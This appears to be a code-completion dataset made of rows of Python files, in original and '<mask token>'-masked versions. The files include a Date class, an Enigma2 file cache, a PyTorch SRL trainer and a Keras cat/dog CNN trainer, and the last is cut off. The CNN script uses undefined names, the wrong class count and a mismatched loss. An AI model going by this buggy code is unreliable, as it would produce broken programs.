main(sys.argv)
| null | null | null | null | [
0
] |
16 | 805fc9a26650f85227d14da972311ffbd9dbd555 | <mask token>
| class Date:
<mask token>
| class Date:
def __init__(self, strDate):
strDate = strDate.split('.')
self.day = strDate[0]
self.month = strDate[1]
self.year = strDate[2]
| class Date:
def __init__(self, strDate):
strDate = strDate.split('.')
self.day = strDate[0]
self.month = strDate[1]
self.year = strDate[2]
| null | [
0,
1,
2,
3
] |
17 | a7218971b831e2cfda9a035eddb350ecf1cdf938 | #!/usr/bin/python
# encoding: utf-8
#
# In case of reuse of this source code please do not remove this copyright.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For more information on the GNU General Public License see:
# <http://www.gnu.org/licenses/>.
#
from Components.config import config
from datetime import datetime
import os
MinCacheLimit = config.EMC.min_file_cache_limit.getValue()
pathisfile = os.path.isfile
pathisdir = os.path.isdir
pathislink = os.path.islink
pathexists = os.path.exists
pathreal = os.path.realpath
idx_isLink=0
idx_isDir=1
idx_isFile=2
idx_Date=3
idx_realpath=4
idx_num=5
class EMCFileCache():
def __init__(self):
self.cacheDirectoryList = {}
self.cacheFileList = {}
self.cacheAttributeList = {}
self.cacheCountSizeList = {}
def addCountSizeToCache(self, path, count, size):
# print "EMC addCountSizeToCache", path
if self.cacheCountSizeList.has_key(path):
lastcount, lastsize = self.cacheCountSizeList[path]
if lastcount != count or lastsize != size:
del self.cacheCountSizeList[path]
self.cacheCountSizeList[path] = count, size
else:
self.cacheCountSizeList[path] = count, size
# print "EMC addCountSizeToCache", self.cacheCountSizeList
def getCountSizeFromCache(self, path):
if self.cacheCountSizeList.has_key(path):
return self.cacheCountSizeList[path]
else:
return None
# print "EMC getCountSizeFromCache", self.cacheCountSizeList
def delcacheCountSizeList(self):
self.cacheCountSizeList = {}
print "EMC delete cacheCountSizeList", self.cacheCountSizeList
def delcacheCountSizeListEntriesOnFileOp(self,path):
#print "EMC delcacheCountSizeListEntriesOnFileOp",path
rescanPaths = []
if path:
for k in self.cacheCountSizeList.keys():
if (k+"/").startswith(path+"/") or (path+"/").startswith(k+"/"): # drop dirs containing path, but not "a/bc" when path is "a/bcd/e", therefore append "/"
del self.cacheCountSizeList[k]
rescanPaths.append(k)
#print "EMC delcacheCountSizeListEntriesOnFileOp IS deleting",k," due to OP on path ",path
#else:
#print "EMC delcacheCountSizeListEntriesOnFileOp NOT deleting",k," due to OP on path ",path
return rescanPaths
def IsPathInCountSizeList(self, path):
if self.cacheCountSizeList.has_key(path):
return True
else:
return False
def addPathToCache(self, path, subdirlist, filelist, MovieCenterInst):
if config.EMC.files_cache.value:
print "EMC addPathToCache", path
if (len(subdirlist)>MinCacheLimit) or (len(filelist)>MinCacheLimit):
self.cacheDirectoryList[path] = subdirlist
for p, n, e in subdirlist:
if not (p in self.cacheAttributeList):
AttributeList=[None]*idx_num
AttributeList[idx_isLink] = pathislink(p)
AttributeList[idx_isDir] = True # we are in subdirlist
AttributeList[idx_isFile] = False # we are in subdirlist
AttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, True)
AttributeList[idx_realpath] = pathreal(p) #for dirs only
self.cacheAttributeList[p] = AttributeList
self.cacheFileList[path] = filelist
for p, n, e in filelist:
if not (p in self.cacheAttributeList):
AttributeList=[None]*idx_num
AttributeList[idx_isLink] = pathislink(p)
AttributeList[idx_isDir] = False # we are in filelist, no entry is a real directrory ...
AttributeList[idx_isFile] = pathisfile(p) # ... but filelist might contain virtual directories
AttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, False)
#AttributeList[idx_realpath] = pathreal(p) #for dirs only
self.cacheAttributeList[p] = AttributeList
else:
if self.cacheDirectoryList.has_key(path):
self.deleteAssociatedListEntries(self.cacheDirectoryList[path])
del self.cacheDirectoryList[path]
if self.cacheFileList.has_key(path):
self.deleteAssociatedListEntries(self.cacheFileList[path])
del self.cacheFileList[path]
# self.debugPrintDirCache()
# self.debugPrintFileCache()
# self.debugPrintFileAttributeCache()
def addRecToCacheFileList(self, path, rec):
if config.EMC.files_cache.value:
if self.cacheFileList.has_key(path):
filelist = self.cacheFileList[path]
filelist.append(rec)
del self.cacheFileList[path]
self.cacheFileList[path] = filelist
def getCacheForPath(self, path):
print "EMC getCacheForPath", path
if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path):
subdirlist = self.cacheDirectoryList[path]
filelist = self.cacheFileList[path]
# self.debugPrintDirCache()
# self.debugPrintFileCache()
# self.debugPrintFileAttributeCache()
return subdirlist, filelist
else:
return None, None
def isLink(self, path):
isLink = None
if config.EMC.files_cache.value and (path in self.cacheAttributeList):
isLink = self.cacheAttributeList[path][idx_isLink]
if isLink is None:
isLink = pathislink(path)
return isLink
def isDir(self, path):
isDir = None
if (config.EMC.check_dead_links.value != "always") and config.EMC.files_cache.value and (path in self.cacheAttributeList):
isDir = self.cacheAttributeList[path][idx_isDir]
if isDir is None:
isDir = pathisdir(path)
return isDir
def isFile(self, path):
isFile = None
if (config.EMC.check_dead_links.value != "always") and config.EMC.files_cache.value and (path in self.cacheAttributeList):
isFile = self.cacheAttributeList[path][idx_isFile]
if isFile is None:
isFile = pathisfile(path)
return isFile
def realpath(self, path):
realpath = None
if config.EMC.files_cache.value and (path in self.cacheAttributeList):
realpath = self.cacheAttributeList[path][idx_realpath]
if realpath is None:
realpath = pathreal(path)
return realpath
def getDateInfoFromCacheForPath(self, path):
if config.EMC.files_cache.value and (path in self.cacheAttributeList):
return self.cacheAttributeList[path][idx_Date]
else:
return None
def getDirsFromCacheForPath(self, path):
if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path):
subdirlist = self.cacheDirectoryList[path]
return subdirlist
else:
return None
def getFilesFromCacheForPath(self, path):
if config.EMC.files_cache.value and self.cacheFileList.has_key(path):
filelist = self.cacheFileList[path]
return filelist
else:
return None
def IsPathInCache(self, path):
if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path):
return True
else:
return False
def IsPathWithDirsInCache(self, path):
if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path):
return True
else:
return False
def IsPathWithFilesInCache(self, path):
if config.EMC.files_cache.value and self.cacheFileList.has_key(path):
return True
else:
return False
def delPathFromCache(self, path):
if len(path)>1 and path[-1]=="/":
path = path[:-1]
print "EMC delPathFromCache", path
if self.cacheDirectoryList.has_key(path):
self.deleteAssociatedListEntries(self.cacheDirectoryList[path])
del self.cacheDirectoryList[path]
if self.cacheFileList.has_key(path):
self.deleteAssociatedListEntries(self.cacheFileList[path])
del self.cacheFileList[path]
# self.debugPrintDirCache()
# self.debugPrintFileCache()
# self.debugPrintFileAttributeCache()
def delPathFromDirCache(self, path):
if len(path)>1 and path[-1]=="/":
path = path[:-1]
if self.cacheDirectoryList.has_key(path):
self.deleteAssociatedListEntries(self.cacheDirectoryList[path])
del self.cacheDirectoryList[path]
def delPathFromFileCache(self, path):
if len(path)>1 and path[-1]=="/":
path = path[:-1]
if self.cacheFileList.has_key(path):
self.deleteAssociatedListEntries(self.cacheFileList[path])
del self.cacheFileList[path]
def debugPrintFileCache(self):
print "cacheFileList:"
for p in self.cacheFileList:
print p,self.cacheFileList[p]
print ""
def debugPrintDirCache(self):
print "cacheDirectoryList:"
for p in self.cacheDirectoryList:
print p,self.cacheDirectoryList[p]
print ""
def debugPrintFileAttributeCache(self):
print "cacheAttributeList:"
for p in self.cacheAttributeList:
print p,self.cacheAttributeList[p]
print ""
def deleteAssociatedListEntries(self, list):
for p, n, e in list:
if p in self.cacheAttributeList and (config.EMC.check_dead_links.value != "only_initially"):
del self.cacheAttributeList[p]
movieFileCache = EMCFileCache()
| null | null | null | null | [
0
] |
18 | 038ccba05113fb7f2f589eaa7345df53cb59a5af | <mask token>
| <mask token>
def train(num_epochs=30):
lossfunction = nn.CrossEntropyLoss()
trainset = TrainDataSet()
model = BiAffineSrlModel(vocabs=trainset.vocabs)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_f = FScore()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)
print('-' * 10, file=sys.stderr)
for phase in ['train', 'dev']:
model.train(phase == 'train')
running_loss = 0.0
running_f = FScore()
for sentence in pb.progressbar(trainset.get_set(phase)):
model.zero_grad()
role_p = model(*sentence['inputs'])
_, predict = torch.max(role_p, 1)
loss = lossfunction(role_p, autograd.Variable(sentence[
'targets'][0]))
if phase == 'train':
loss.backward()
optimizer.step()
if epoch > 28:
print(predict.data)
print(sentence['targets'][0])
running_loss += loss.data[0]
running_f.update(predict, sentence['targets'][0])
print('\n{} Loss: {:.4f} {}'.format(phase, running_loss,
running_f), file=sys.stderr)
if phase == 'dev' and running_f > best_f:
best_f = running_f
best_model_wts = copy.deepcopy(model.state_dict())
print('', file=sys.stderr)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,
time_elapsed % 60), file=sys.stderr)
print('Best val F: {}s'.format(best_f), file=sys.stderr)
model.load_state_dict(best_model_wts)
return model
<mask token>
| <mask token>
config.add_option('-m', '--mode', dest='mode', default='train', type=
'string', help='[train|eval|pred]', action='store')
config.add_option('--seed', dest='seed', default=1, type='int', help=
'torch random seed', action='store')
def train(num_epochs=30):
lossfunction = nn.CrossEntropyLoss()
trainset = TrainDataSet()
model = BiAffineSrlModel(vocabs=trainset.vocabs)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_f = FScore()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)
print('-' * 10, file=sys.stderr)
for phase in ['train', 'dev']:
model.train(phase == 'train')
running_loss = 0.0
running_f = FScore()
for sentence in pb.progressbar(trainset.get_set(phase)):
model.zero_grad()
role_p = model(*sentence['inputs'])
_, predict = torch.max(role_p, 1)
loss = lossfunction(role_p, autograd.Variable(sentence[
'targets'][0]))
if phase == 'train':
loss.backward()
optimizer.step()
if epoch > 28:
print(predict.data)
print(sentence['targets'][0])
running_loss += loss.data[0]
running_f.update(predict, sentence['targets'][0])
print('\n{} Loss: {:.4f} {}'.format(phase, running_loss,
running_f), file=sys.stderr)
if phase == 'dev' and running_f > best_f:
best_f = running_f
best_model_wts = copy.deepcopy(model.state_dict())
print('', file=sys.stderr)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,
time_elapsed % 60), file=sys.stderr)
print('Best val F: {}s'.format(best_f), file=sys.stderr)
model.load_state_dict(best_model_wts)
return model
if __name__ == '__main__':
config.parse_args()
torch.manual_seed(config.get_option('seed'))
mode = config.get_option('mode')
if mode == 'train':
train()
else:
NotImplementedError()
| import sys
import torch
from torch import nn, autograd
import config
import time
import copy
import progressbar as pb
from dataset import TrainDataSet
from model import BiAffineSrlModel
from fscore import FScore
config.add_option('-m', '--mode', dest='mode', default='train', type=
'string', help='[train|eval|pred]', action='store')
config.add_option('--seed', dest='seed', default=1, type='int', help=
'torch random seed', action='store')
def train(num_epochs=30):
lossfunction = nn.CrossEntropyLoss()
trainset = TrainDataSet()
model = BiAffineSrlModel(vocabs=trainset.vocabs)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_f = FScore()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)
print('-' * 10, file=sys.stderr)
for phase in ['train', 'dev']:
model.train(phase == 'train')
running_loss = 0.0
running_f = FScore()
for sentence in pb.progressbar(trainset.get_set(phase)):
model.zero_grad()
role_p = model(*sentence['inputs'])
_, predict = torch.max(role_p, 1)
loss = lossfunction(role_p, autograd.Variable(sentence[
'targets'][0]))
if phase == 'train':
loss.backward()
optimizer.step()
if epoch > 28:
print(predict.data)
print(sentence['targets'][0])
running_loss += loss.data[0]
running_f.update(predict, sentence['targets'][0])
print('\n{} Loss: {:.4f} {}'.format(phase, running_loss,
running_f), file=sys.stderr)
if phase == 'dev' and running_f > best_f:
best_f = running_f
best_model_wts = copy.deepcopy(model.state_dict())
print('', file=sys.stderr)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,
time_elapsed % 60), file=sys.stderr)
print('Best val F: {}s'.format(best_f), file=sys.stderr)
model.load_state_dict(best_model_wts)
return model
if __name__ == '__main__':
config.parse_args()
torch.manual_seed(config.get_option('seed'))
mode = config.get_option('mode')
if mode == 'train':
train()
else:
NotImplementedError()
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import torch
from torch import nn, autograd
import config
import time
import copy
import progressbar as pb
from dataset import TrainDataSet
from model import BiAffineSrlModel
from fscore import FScore
config.add_option('-m', '--mode', dest='mode', default='train', type='string', help='[train|eval|pred]', action='store')
config.add_option('--seed', dest='seed', default=1, type='int', help='torch random seed', action='store')
def train(num_epochs = 30):
lossfunction = nn.CrossEntropyLoss()
trainset = TrainDataSet()
model = BiAffineSrlModel(vocabs=trainset.vocabs)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_f = FScore()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)
print('-' * 10, file=sys.stderr)
for phase in ['train', 'dev']:
model.train(phase == 'train')
running_loss = 0.0
running_f = FScore()
for sentence in pb.progressbar(trainset.get_set(phase)):
model.zero_grad()
role_p = model(*sentence['inputs'])
_, predict = torch.max(role_p, 1)
loss = lossfunction(role_p, autograd.Variable(sentence['targets'][0]))
if phase == 'train':
loss.backward()
optimizer.step()
if epoch > 28:
print(predict.data)
print(sentence['targets'][0])
running_loss += loss.data[0]
running_f.update(predict, sentence['targets'][0])
print('\n{} Loss: {:.4f} {}'.format(phase, running_loss, running_f), file=sys.stderr)
if phase == 'dev' and running_f > best_f:
best_f = running_f
best_model_wts = copy.deepcopy(model.state_dict())
print('', file=sys.stderr)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60), file=sys.stderr)
print('Best val F: {}s'.format(best_f), file=sys.stderr)
model.load_state_dict(best_model_wts)
return model
if __name__ == '__main__':
config.parse_args()
torch.manual_seed(config.get_option('seed'))
mode = config.get_option('mode')
if mode == 'train':
train()
else:
NotImplementedError()
| [
0,
1,
2,
3,
4
] |
19 | b5180a2dbe1f12e1bbc92874c67ea99c9a84a9ed | <mask token>
| <mask token>
for card in cards:
try:
number = int(card)
if number % 2 == 0:
print(card, 'is an even card.')
except ValueError:
print(card, 'can not be divided')
| cards = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']
for card in cards:
try:
number = int(card)
if number % 2 == 0:
print(card, 'is an even card.')
except ValueError:
print(card, 'can not be divided')
|
# print all cards with even numbers.
cards = ["2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "A"]
for card in cards:
try:
number = int(card)
if number % 2 == 0: # modulo operator
print(card, "is an even card.")
except ValueError:
print (card, "can not be divided")
| null | [
0,
1,
2,
3
] |
20 | a045423edd94d985dfc9660bcfe4a88c61bf4574 | #Script start
print"This is the two number subtraction python program."
a = 9
b = 2
c = a - b
print c
# Scrip close
| null | null | null | null | [
0
] |
21 | 13c9f0f58ec6da317c3802f594bb0db7c275dee9 | <mask token>
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
classIndex = CATEGORIES.index(category)
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.
IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
<mask token>
| <mask token>
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
for img in os.listdir(path):
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
plt.imshow(img_array, cmap='gray')
plt.show()
print(img_array)
print(img_array.shape)
break
break
<mask token>
plt.imshow(resized_img_array, cmap='gray')
plt.show()
<mask token>
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
classIndex = CATEGORIES.index(category)
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.
IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
create_training_data()
print(len(training_data))
<mask token>
random.shuffle(training_data)
<mask token>
for features, label in training_data:
x.append(features)
y.append(label)
<mask token>
pickle.dump(x, pickle_out)
pickle_out.close()
<mask token>
pickle.dump(y, pickle_out)
pickle_out.close()
<mask token>
for dense_layer in dense_layers:
for layer_size in layer_sizes:
for conv_layer in conv_layers:
NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,
layer_size, dense_layer, int(time.time()))
print(NAME)
model = Sequential()
model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
for l in range(conv_layer - 1):
model.add(Conv2D(layer_size, (5, 5)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(DROPOUT))
model.add(Flatten())
for _ in range(dense_layer):
model.add(Dense(layer_size))
model.add(Activation('relu'))
model.add(Dropout(DROPOUT))
model.add(Dense(NB_CLASSES))
model.add(Activation('softmax'))
tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))
model.compile(loss='categorical_crossentropy', optimizer=
OPTIMIZER, metrics=['accuracy'])
history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=
NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,
callbacks=[tensorboard])
if history.history.get('val_acc')[-1] > max:
max = history.history.get('val_acc')[-1]
if accIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)
val_acc_out.close()
accIndex += 1
pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')
p_upload = pickle.load(pickle_upload)
print(p_upload)
if history.history.get('val_loss')[-1] < min:
min = history.history.get('val_loss')[-1]
if lossIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)
val_loss_out.close()
lossIndex += 1
model.save('64x3-CNN.model')
<mask token>
def prepare(filepath):
IMG_SIZE = 299
img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)
<mask token>
print(prediction)
print(prediction[0][0])
print(CATEGORIES[int(prediction[0][0])])
<mask token>
print(prediction)
print(CATEGORIES[int(prediction[0][0])])
<mask token>
| <mask token>
DATADIR = 'content/PetImages'
CATEGORIES = ['Cat', 'Dog']
img_array = []
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
for img in os.listdir(path):
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
plt.imshow(img_array, cmap='gray')
plt.show()
print(img_array)
print(img_array.shape)
break
break
IMG_SIZE = 299
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
plt.imshow(resized_img_array, cmap='gray')
plt.show()
training_data = []
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
classIndex = CATEGORIES.index(category)
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.
IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
create_training_data()
print(len(training_data))
<mask token>
random.shuffle(training_data)
x = []
y = []
for features, label in training_data:
x.append(features)
y.append(label)
x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3)
pickle_out = open('x.pickle', 'wb')
pickle.dump(x, pickle_out)
pickle_out.close()
pickle_out = open('y.pickle', 'wb')
pickle.dump(y, pickle_out)
pickle_out.close()
pickle_in = open('x.pickle', 'rb')
x = pickle.load(pickle_in)
pickle_in = open('y.pickle', 'rb')
y = pickle.load(pickle_in)
x = x / 255.0
INPUT_SHAPE = x.shape[1:]
DROPOUT = 0.2
NB_CLASSES = 10
NB_EPOCHS = 10
BATCH_SIZE = 128
VALIDATION_SPLIT = 0.2
OPTIMIZER = Adam()
max, min, accIndex, lossIndex = 70.0, 4.0, 1, 1
date = datetime.datetime.now()
dense_layers = [2, 1, 0]
layer_sizes = [512, 256, 128, 64]
conv_layers = [3, 2, 1]
for dense_layer in dense_layers:
for layer_size in layer_sizes:
for conv_layer in conv_layers:
NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,
layer_size, dense_layer, int(time.time()))
print(NAME)
model = Sequential()
model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
for l in range(conv_layer - 1):
model.add(Conv2D(layer_size, (5, 5)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(DROPOUT))
model.add(Flatten())
for _ in range(dense_layer):
model.add(Dense(layer_size))
model.add(Activation('relu'))
model.add(Dropout(DROPOUT))
model.add(Dense(NB_CLASSES))
model.add(Activation('softmax'))
tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))
model.compile(loss='categorical_crossentropy', optimizer=
OPTIMIZER, metrics=['accuracy'])
history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=
NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,
callbacks=[tensorboard])
if history.history.get('val_acc')[-1] > max:
max = history.history.get('val_acc')[-1]
if accIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)
val_acc_out.close()
accIndex += 1
pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')
p_upload = pickle.load(pickle_upload)
print(p_upload)
if history.history.get('val_loss')[-1] < min:
min = history.history.get('val_loss')[-1]
if lossIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)
val_loss_out.close()
lossIndex += 1
model.save('64x3-CNN.model')
CATEGORIES = ['Dog', 'Cat']
def prepare(filepath):
IMG_SIZE = 299
img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)
model = tf.keras.models.load_model('64x3-CNN.model')
prediction = model.predict([prepare('dog.jpg')])
print(prediction)
print(prediction[0][0])
print(CATEGORIES[int(prediction[0][0])])
prediction = model.predict([prepare('cat.jpg')])
print(prediction)
print(CATEGORIES[int(prediction[0][0])])
<mask token>
| <mask token>
import numpy as np
import matplotlib.pyplot as plt
import os
import cv2
import pickle
import random
import datetime
import tensorflow as tf
from tensorflow.python.keras.datasets import cifar10
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout
from tensorflow.python.keras.layers import Conv2D, MaxPooling2D
from tensorflow.python.keras.optimizers import Adam
from tensorflow.python.keras.callbacks import TensorBoard
DATADIR = 'content/PetImages'
CATEGORIES = ['Cat', 'Dog']
img_array = []
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
for img in os.listdir(path):
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
plt.imshow(img_array, cmap='gray')
plt.show()
print(img_array)
print(img_array.shape)
break
break
IMG_SIZE = 299
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
plt.imshow(resized_img_array, cmap='gray')
plt.show()
training_data = []
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
classIndex = CATEGORIES.index(category)
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.
IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
create_training_data()
print(len(training_data))
<mask token>
random.shuffle(training_data)
x = []
y = []
for features, label in training_data:
x.append(features)
y.append(label)
x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3)
pickle_out = open('x.pickle', 'wb')
pickle.dump(x, pickle_out)
pickle_out.close()
pickle_out = open('y.pickle', 'wb')
pickle.dump(y, pickle_out)
pickle_out.close()
pickle_in = open('x.pickle', 'rb')
x = pickle.load(pickle_in)
pickle_in = open('y.pickle', 'rb')
y = pickle.load(pickle_in)
x = x / 255.0
INPUT_SHAPE = x.shape[1:]
DROPOUT = 0.2
NB_CLASSES = 10
NB_EPOCHS = 10
BATCH_SIZE = 128
VALIDATION_SPLIT = 0.2
OPTIMIZER = Adam()
max, min, accIndex, lossIndex = 70.0, 4.0, 1, 1
date = datetime.datetime.now()
dense_layers = [2, 1, 0]
layer_sizes = [512, 256, 128, 64]
conv_layers = [3, 2, 1]
for dense_layer in dense_layers:
for layer_size in layer_sizes:
for conv_layer in conv_layers:
NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,
layer_size, dense_layer, int(time.time()))
print(NAME)
model = Sequential()
model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
for l in range(conv_layer - 1):
model.add(Conv2D(layer_size, (5, 5)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(DROPOUT))
model.add(Flatten())
for _ in range(dense_layer):
model.add(Dense(layer_size))
model.add(Activation('relu'))
model.add(Dropout(DROPOUT))
model.add(Dense(NB_CLASSES))
model.add(Activation('softmax'))
tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))
model.compile(loss='categorical_crossentropy', optimizer=
OPTIMIZER, metrics=['accuracy'])
history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=
NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,
callbacks=[tensorboard])
if history.history.get('val_acc')[-1] > max:
max = history.history.get('val_acc')[-1]
if accIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')
pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,
round(max, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)
val_acc_out.close()
accIndex += 1
pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')
p_upload = pickle.load(pickle_upload)
print(p_upload)
if history.history.get('val_loss')[-1] < min:
min = history.history.get('val_loss')[-1]
if lossIndex >= 2:
os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,
round(min, 4), CBP[0], CBP[1], CBP[2],
f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))
